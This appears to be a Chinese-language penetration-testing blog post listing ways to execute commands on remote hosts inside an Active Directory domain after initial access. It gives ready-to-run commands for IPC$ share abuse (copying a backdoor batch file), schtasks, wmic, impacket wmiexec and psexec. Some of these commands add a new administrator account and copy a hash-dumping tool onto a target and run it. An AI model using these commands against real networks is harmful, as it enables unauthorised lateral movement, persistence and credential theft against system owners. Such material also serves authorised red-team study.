前言AD的全称是Active Directory:活动目录 域(Domain)是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后两个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。 在域渗透场景中,我们已经进入内网,会遇到大量的开放端口和服务,弱密码空密码,这个时候我们可以使用它们已经开启的服务选择对应的方式进行命令执行。本文对ad域渗透中常见的命令执行方式进行一个总结。 ipc前提开启ipc共享 配置本地安全策略:开始->运行-> secpol.msc->本地策略->安全选项->网络访问:共享>和本地帐户的安全模型>经典-本地用户进行身份验证 配置本地组策略:运行gpedit.msc ——计算机配置——Windows设置——安全设置——本地策略 文件共享写入后门文件 net use z: \\目标IP\c$ 'passwd' /user:'admin' 或 copy hack.bat \\目标ip\c$ #删除连接 net use \\目标IP\ipc$ /del 后续使用下面的方式执行at(win10不可用)定时任务执行命令 前提开启windows Event log服务,开启Task Scheduler服务 其余条件同ipc 命令执行
schtasks 前提开启windows Event log服务,开启Task Scheduler服务 其余条件同ipc schtasks /create /tn firstTask /tr 'c:\windows\system32\cmd.exe /c calc' /sc once /st 00:00 /S 170.170.64.19 /RU System /u admin /p passwd schtasks /run /tn firstTask /S 170.170.64.19 /u admin /p passwd schtasks /F /delete /tn firstTask /S 170.170.64.19 /u admin /p passwd telnet 前提开启telnet服务 命令执行
sc windows2003 windows XP 命令执行
wmic 前提开启wmi服务,135端口 命令执行wmic /node:170.170.64.19 /user:admin /password:passwd process call create 'cmd.exe /c calc.exe'
wmic /node:170.170.64.19 /user:admin /password:passwd process call create 'cmd.exe /c net user test 123456 /add && net localgroup administrators test /add' wmiexec.vbs(需要安装) 前提开启wmi服务,135端口 安装下载vmiexec.vbs 命令执行
impackets wmiexec(需要安装) 前提开启wmi服务,135端口 安装git clone https://github.com/SecureAuthCorp/impacket/ pip install -r requirements.txt pip install impacket 命令执行
psexec(需要安装) 前提开启admin$共享 安装在 https://docs.microsoft.com/en-us/sysinternals/downloads/psexec 下载安装 命令执行#打开交互式shell psexec \\170.170.64.19 -u admin -p passwd cmd #执行单条命令 psexec \\170.170.64.19 -u admin -p passwd -s cmd /c 'calc.exe' #拷贝文件到远程计算机并执行 psexec \\170.170.64.19 -u admin -p passwd -c C:\Users\Administrator\Desktop\GetHashes.exe
#其他参数 –accepteula 第一次运行会弹框,输入这个参数便不会弹框 -s 以 “nt authority\system” 权限运行远程进程 -h 如果可以,以管理员权限运行远程进程 -d 不等待程序执行完就返回,请只对非交互式应用程序使用此选项 \\ip 可以替换成 @ip.txt (存放多个 ip 的文本),可以批量执行命令 远程桌面 前提开启远程桌面,3389端口 命令执行可直接通过mstsc进入目标系统。
作者:Leticia,文章来源:Leticia's Blog |
|